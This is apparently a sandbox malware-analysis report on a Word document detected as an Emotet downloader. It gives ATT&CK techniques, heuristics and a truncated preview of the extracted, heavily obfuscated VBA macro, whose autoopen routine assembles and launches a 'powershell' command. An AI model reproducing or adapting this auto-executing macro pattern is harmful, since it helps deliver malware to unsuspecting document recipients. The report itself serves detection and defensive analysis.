MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
A critical heuristic, VBA WMI Win32_Process launcher, fired on this sample, indicating that the VBA macro attempts to start processes through WMI. The presence of an AutoOpen macro and the ClamAV detection for 'Doc.Downloader.Emotet-6888558-0' strongly suggest Emotet family activity. The VBA script, although heavily obfuscated, likely facilitates the download and execution of a secondary payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6888558-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6888558-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60436 bytes |

SHA-256 of macros.bas: 4a3809d36c9b357a8cdf02ee9c86d6a1d5bd62c0fdfbb065b9c6a31218bf2e0d
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "KCDAB1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YAoAcUA()
Set fkXABw = wXAkAUQA
If qAABkAGA = NQC1XcA Then
rA1xDAx = CBool(331546950 - Round(CDQUAAAQ) * UDQ_AU * 199427170)
zXGBAB_ = Chr(M4D_ADU)
TAGkX1A = CDate(72203852 * 754263603)
sUAQcAQD = Oct(qAkAQAA - Round(jAcwADGB))
End If
Set GAADxAo = iBDCUBD
If w4AoQX = dBoXCoQA Then
pUxCGQ = CLng(962720796 - CDbl(tAGDAB) * jAABAQAB * 295043834)
lGQAA4B = CInt(BABAxo)
uZA44AB = Tan(326015531 * 99565947)
fGDUDQx = CDate(b4ZXAXA - Sin(RQDDcUAB))
End If
Set TAU_AZAA = IDADQBX
If qQAA1AGA = IDx4AxA Then
kDDUBDBQ = CInt(524473724 - ChrW(GADxAAD) * JAABAU1 * 152642215)
DUUAAAAA = CInt(Y_AAAA)
zGAAkABA = Rnd(668889659 * 239035900)
pU1AA4 = Int(lDXDUU - CByte(aDAAB1AA))
End If
Set wox4AG1A = bDAABD
If w_UACZ = ocUw_UU Then
FABAxDc = ChrW(274826799 - Chr(CwAGCCk_) * KCQAAA1 * 238332441)
HADAZCAA = ChrB(V_AGAD)
XAACAX = Log(402121482 * 156006925)
WkAADxUU = Round(JcABQG - CByte(ooAcXcQG))
End If
Set iCxUDo = VQ_QUUAZ
If j4UAAkA = LAAAGw Then
vCQAoGU = Rnd(197039317 - CSng(ZQU4AGZ) * P4XoDUQA * 86388918)
pAxADBAA = Cos(BBAUAXU4)
G_AAAUA_ = ChrB(240485264 * 91840547)
WXAAQDA = Chr(kAc1ABXC - Sin(H1AQAx))
End If
Set iXXxxGGU = MGcUADcA
If UBAcAQDw = ZcwQDAAA Then
B1QAABxB = Int(784761315 - CBool(s1ZADAw) * fAADAw_ * 205667607)
JAAQQkQA = Int(bAABwAU)
zQCG4k4 = Rnd(137375139 * 430664323)
TAQAQAAQ = CStr(QwkACD - CByte(GAQAQA))
End If
Set aQABAAB = jZAcU_Q
If kAD_AkAQ = Zo_BCo Then
lckAAAQ = Chr(560795357 - Log(CUQDAA) * QADZ1DQ * 784928056)
KCDDcBA = ChrB(pAGCoxCA)
V4BABBD = Round(246508817 * 216385499)
TGAoDXwC = Tan(NQQABAk_ - Fix(h_ADxA))
End If
End Function
Sub autoopen()
On Error Resume Next
Set RAAAXA4D = SCkAwGAc
If GcZZxwU = IXAxBXB Then
NAAAU4GU = Tan(836694526 - Round(uGXwB4) * qACXDA * 638859433)
z1AAoAU = ChrB(k1ABAUxD)
AB_wAAC = Hex(565900788 * 305512387)
jAAkAQc = CDbl(M_4BADAc - Cos(KU1AQcZ))
End If
Set loBQZBU = boUA1wwU
If ODBCwZw = zoBCAUQA Then
SxAkwBDA = Cos(874558623 - Int(UDD1Ako) * C1AAAAU * 925895404)
ZAZAAUwA = Log(G4ADw4Q)
m1AckAA = Fix(582030249 * 237791620)
tAGc1AA = CSng(vXBwQ_ - Cos(DBGAC1Z4))
End If
nw_X4Ak (zoUQAx + "po" + lBoABA + "wershel" + tAUcCBAG + BkA_AXAD + uoAAAUAB + JZAXBD + qXGDXkQ + iw1BUB + IQBG1A + oDAAxA + tADAUAZG)
Set zU1DB1XA = F1AQGU
If RADDCXAB = mABAcAkC Then
QQoAAAk = CDate(287115903 - Atn(X4AAkw) * mDDc1XA * 261735182)
QwUUAA = CInt(uAwwAcG)
H1kAAUQ = Int(213326584 * 317072643)
YUBoAD = CByte(lAAUxBAA - Cos(CkAUAQC))
End If
Set IAGAGCkx = WGx4D1B
If LoAwADXX = MkBAXwkX Then
LQZA_4AA = Fix(505935207 - Cos(OZAwAAZZ) * n_AoABA * 855163222)
GkAQ_UwQ = Int(IGUAC4QA)
jGxXA1 = Int(330729557 * 168683964)
BXA1AA = ChrW(oQUAAUAD - Cos(vAAA4A))
End If
End Sub
Function cDAAAB()
Set WAAAGcA = mUABAwCA
If XAGZG1Q = aokAZCkB Then
GAAB_U1 = Sqr(433732450 - Fix(lxAwCxAQ) * YkcAAk * 619340989)
jGDQQG1k = ChrW(pUBADC)
uQ_1DX = CLng(368504264 * 898157917)
dBADA4_ = Oct(ZoBGAZQ - ChrB(jGAAAoA))
End If
Set cAAAQQ = fAQQQAD
If pAAGDU = hAXAA4 Then
PAAAAAU = CByte(282795031 - Hex(fXBUwQC) * HQBXA14o * 367044481)
jUAA_QA = CInt(JQAAcQA)
wUoBGw = CSng(749044112 * 730934858)
mAAx4wUo = Hex(zUAxUA - ChrB(nwAACAA))
End If
Set vwD1UQ = ZCDAAkAA
If EDAACGQ = d1owUUAQ Then
... (truncated)